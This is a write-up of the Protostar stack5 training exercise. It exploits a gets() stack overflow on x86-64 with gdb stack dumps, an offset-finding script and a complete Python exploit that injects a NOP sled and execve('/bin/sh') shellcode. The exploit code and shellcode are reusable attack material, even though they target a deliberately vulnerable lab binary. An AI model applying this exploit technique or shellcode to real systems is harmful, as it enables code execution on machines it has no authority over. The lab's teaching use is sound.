Protostar stack5 – Shellcode with stack overflows

OS: Parrot OS x64

Stack5.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  /* gets() has no length limit: anything past 64 bytes overwrites the saved rbp and return address */
  gets(buffer);
}

Build file:

gcc -fno-stack-protector -z execstack -Wl,-z,norelro -o stack5 stack5.c

(-fno-stack-protector removes the stack canary that would otherwise abort the program before ret, -z execstack makes the stack executable so the shellcode can run from it, and -Wl,-z,norelro leaves the GOT writable; the last one is not needed for this exploit but keeps the binary as unhardened as the original Protostar build.)

Checksec:

Analysis:

  • This is a simple task, x64
  • No protection (you can add more if you like :v)
  • Execute /bin/sh

Review main code:

Check padding:

buffer sits at rbp-0x40 (see the lea rax,[rbp-0x40] in the disassembly below), so 64 bytes fill it, the next 8 bytes overwrite the saved rbp, and byte 72 onwards lands on the saved return address:

=> "A"*72
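The 72 above can be found without counting by feeding a cyclic (de Bruijn) pattern instead of A's. This is an added example, not code from the original post; the names cyclic and cyclic_find are my own. On x86-64 the pattern bytes form a non-canonical address, so the process faults on the ret itself and rip is never overwritten; the value to look up is the 8 bytes at $rsp at the crash (x/gx $rsp), which cyclic_find accepts either as raw bytes or as the integer gdb prints.

```python
# Added example: de Bruijn "cyclic pattern" for locating the return-address offset.
# Not part of the original post; function names are my own.
from itertools import islice

# lowercase letters only: no 0x0a byte, so gets() reads the whole pattern
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 8) -> bytes:
    """First `length` bytes of a pattern whose every n-byte window is unique (n=8 for x86-64)."""
    return bytes(islice(_de_bruijn(ALPHABET, n), length))


def cyclic_find(needle, n: int = 8, max_len: int = 4096) -> int:
    """Offset of an n-byte window in the pattern, or -1 if it is not in the first max_len bytes.

    `needle` is either the raw bytes seen in memory or the integer gdb prints for
    `x/gx $rsp`; the integer is little-endian, so its low byte is the first byte in memory.
    """
    if isinstance(needle, int):
        needle = needle.to_bytes(n, "little")
    return cyclic(max_len, n).find(bytes(needle[:n]))


if __name__ == "__main__":
    import sys
    # python3 cyclic.py 200 > pattern ; gdb -q ./stack5 ; run < pattern ; x/gx $rsp
    length = int(sys.argv[1]) if len(sys.argv) > 1 else 200
    sys.stdout.buffer.write(cyclic(length) + b"\n")
```

For stack5 the word at $rsp after the fault is the pattern bytes 72..79, so cyclic_find returns 72; the same lookup works for any register or stack slot that ends up holding pattern bytes.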

Check sp:

First a marker payload: BBBBBBBB lands on the saved return address and four int3 bytes show where the bytes after it end up on the stack.

import struct
import sys

offset = b"A" * 72          # 64-byte buffer + 8-byte saved rbp
sp = b"BBBBBBBB"            # marker landing on the saved return address
shellcode = b"\xcc" * 4     # int3 marker showing where the shellcode will sit

# python3 exploit.py > exploit   (gets() stops at the trailing newline)
sys.stdout.buffer.write(offset + sp + shellcode + b"\n")

Run it under gdb with a breakpoint on the leave, then single-step through leave and ret:

$ gdb -q stack5
Reading symbols from stack5...
(No debugging symbols found in stack5)
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x000000000040113d <+0>:	push   rbp
   0x000000000040113e <+1>:	mov    rbp,rsp
   0x0000000000401141 <+4>:	sub    rsp,0x50
   0x0000000000401145 <+8>:	mov    DWORD PTR [rbp-0x44],edi
   0x0000000000401148 <+11>:	mov    QWORD PTR [rbp-0x50],rsi
   0x000000000040114c <+15>:	lea    rax,[rbp-0x40]
   0x0000000000401150 <+19>:	mov    rdi,rax
   0x0000000000401153 <+22>:	call   0x401030 <gets@plt>
   0x0000000000401158 <+27>:	leave  
   0x0000000000401159 <+28>:	ret    
End of assembler dump.
(gdb) break *0x0000000000401158
Breakpoint 1 at 0x401158
(gdb) run < exploit
Starting program: /home/user/Desktop/stack5 < exploit

Breakpoint 1, 0x0000000000401158 in main ()
(gdb) x/32x $rsp
0x7fffffffe3c0:	0xffffe508	0x00007fff	0x000000c2	0x00000001
0x7fffffffe3d0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe3e0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe3f0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe400:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffe410:	0x41414141	0x41414141	0x42424242	0x42424242
0x7fffffffe420:	0xcccccccc	0x00007f00	0x00000000	0x00000001
0x7fffffffe430:	0x0040113d	0x00000000	0xf7e067d9	0x00007fff
(gdb) si
0x0000000000401159 in main ()
(gdb) x/32x $rsp
0x7fffffffe418:	0x42424242	0x42424242	0xcccccccc	0x00007f00
0x7fffffffe428:	0x00000000	0x00000001	0x0040113d	0x00000000
0x7fffffffe438:	0xf7e067d9	0x00007fff	0x00000000	0x00000000
0x7fffffffe448:	0x38c54747	0x179b2b52	0x00401040	0x00000000
0x7fffffffe458:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe468:	0x00000000	0x00000000	0xd2454747	0xe864d42d
0x7fffffffe478:	0xc3034747	0xe864c412	0x00000000	0x00000000
0x7fffffffe488:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) si

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401159 in main ()
(gdb) x/32x $rsp
0x7fffffffe418:	0x42424242	0x42424242	0xcccccccc	0x00007f00
0x7fffffffe428:	0x00000000	0x00000001	0x0040113d	0x00000000
0x7fffffffe438:	0xf7e067d9	0x00007fff	0x00000000	0x00000000
0x7fffffffe448:	0x38c54747	0x179b2b52	0x00401040	0x00000000
0x7fffffffe458:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffe468:	0x00000000	0x00000000	0xd2454747	0xe864d42d
0x7fffffffe478:	0xc3034747	0xe864c412	0x00000000	0x00000000
0x7fffffffe488:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb)

The third si faults without leaving main: 0x4242424242424242 is not a canonical x86-64 address, so ret raises a general protection fault before rip is updated, which is why rip still reads 0x401159 and rsp still points at the BBBBBBBB word. The useful number is the stack slot just above the saved return address, 0x7fffffffe420: that is where rsp points after ret, and it is where the bytes following the overwritten return address (the 0xcccccccc marker here, the NOP sled in the final payload) sit. With a 320-byte NOP sled starting there, any address in 0x7fffffffe420..0x7fffffffe560 works; aiming at the middle leaves slack in both directions.

sp => 0x00007fffffffe4c0

This address only holds with ASLR disabled (kernel.randomize_va_space = 0, or run under setarch -R) and with roughly the same environment as the gdb session: gdb adds LINES and COLUMNS to the inferior's environment, which shifts the stack by a few bytes outside the debugger, and the sled is what absorbs that.

Shellcode: Linux/x86-64 execve("/bin/sh"), 27 bytes, from http://shell-storm.org/shellcode/files/shellcode-806.php

Final code:

import struct
import sys

offset = b"A" * 72                            # 64-byte buffer + 8-byte saved rbp
sp = struct.pack("<Q", 0x00007fffffffe4c0)    # new return address: middle of the NOP sled
nops = b"\x90" * 320                          # NOP sled, starts at rsp after ret (0x7fffffffe420)
shellcode = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")  # execve("/bin/sh"), shell-storm 806

# python3 exploit.py > exploit
sys.stdout.buffer.write(offset + sp + nops + shellcode + b"\n")
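Putting the gdb numbers together, as an added example (not the post's code; the helper names are my own): the return address is derived from the sled start that rsp had after ret, and two checks a gets()-fed payload needs are made explicit. The address must be canonical, otherwise ret faults the way the BBBBBBBB run did, and no byte of the payload may be 0x0a, because gets() stops reading at a newline (NUL bytes are fine, gets() reads straight through them).

```python
# Added example: build the stack5 payload from the numbers found in gdb and
# check the properties a gets()-fed payload needs. Not code from the original
# post; function names are my own.
import struct

# 27-byte x86-64 execve("/bin/sh") shellcode used on the page (shell-storm 806)
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

BUFFER_TO_RET = 64 + 8          # 64-byte buffer at rbp-0x40, then the saved rbp
SLED_START = 0x7fffffffe420     # rsp right after ret in the gdb session (assumed from the dump above)


def is_canonical(addr: int) -> bool:
    """x86-64 requires bits 63..47 to all equal bit 47; anything else makes ret raise #GP."""
    return (addr >> 47) in (0, 0x1ffff)


def pick_return_address(sled_start: int, sled_len: int) -> int:
    """Aim at the middle of the NOP sled: a stack shift of up to sled_len/2 either way still hits a NOP."""
    return sled_start + sled_len // 2


def gets_safe(payload: bytes) -> bool:
    """gets() reads until 0x0a; NUL bytes do not stop it, so only a newline truncates the payload."""
    return b"\n" not in payload


def build_payload(ret_addr: int, shellcode: bytes = SHELLCODE, sled_len: int = 320) -> bytes:
    """padding | return address | NOP sled | shellcode, validated for gets()."""
    if not is_canonical(ret_addr):
        raise ValueError("non-canonical address: ret would fault instead of jumping")
    payload = (b"A" * BUFFER_TO_RET
               + struct.pack("<Q", ret_addr)
               + b"\x90" * sled_len
               + shellcode)
    if not gets_safe(payload):
        raise ValueError("payload contains 0x0a; gets() would stop reading there")
    return payload


if __name__ == "__main__":
    import sys
    # python3 build.py > exploit
    sys.stdout.buffer.write(build_payload(pick_return_address(SLED_START, 320)) + b"\n")
```

The newline check matters more than it looks: a return address such as 0x7fffffff0a00 packs to bytes containing 0x0a, and gets() would silently cut the payload at that byte, so the sled and shellcode would never reach the stack.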

Final:

Because the exploit file is the program's whole stdin, the spawned shell reads EOF and exits at once; to keep it interactive, feed the payload and then a live stdin, e.g. (cat exploit; cat) | ./stack5

Published by Nhat Truong
